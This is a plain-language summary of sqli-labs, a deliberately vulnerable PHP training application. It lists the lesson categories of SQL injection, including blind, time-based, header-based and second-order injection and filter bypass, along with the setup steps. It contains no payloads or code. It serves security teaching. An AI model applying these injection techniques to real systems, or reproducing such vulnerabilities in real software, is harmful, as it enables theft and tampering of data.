audi-1/sqli-labs

SQLI-LABS is a deliberately vulnerable PHP web application designed for learning how SQL injection attacks work. SQL injection is a type of security vulnerability where an attacker can insert or manipulate database commands through a web application's input fields, potentially reading, modifying, or deleting data the application stores. The project sets up a local practice environment with a series of lessons, each covering a different category of SQL injection technique. The lessons cover error-based injection (where the attacker reads data through error messages), blind boolean-based injection (where the application gives no visible feedback but the attacker can infer information by asking yes-or-no questions), and time-based blind injection (where the attacker uses deliberate delays in the database's response to extract information). Additional lessons cover injections in database update and insert operations, injections through HTTP headers like cookies and user-agent strings, second-order injections, and methods for bypassing common defenses like blacklists and input sanitization functions. Installation involves unzipping the project into an Apache web server directory, configuring the database credentials in a configuration file, and running a setup page through the browser to create the database and tables. After that, each lesson is accessible by clicking a lesson number from the index page. The repository also includes challenge lessons (from lesson 54 onward) that test the skills covered in the earlier material without providing step-by-step guidance. Video walkthroughs and written explanations for the lessons are available on separate sites linked in the README. This project is intended for security students and developers who want hands-on practice identifying and exploiting SQL injection in a controlled, legal environment.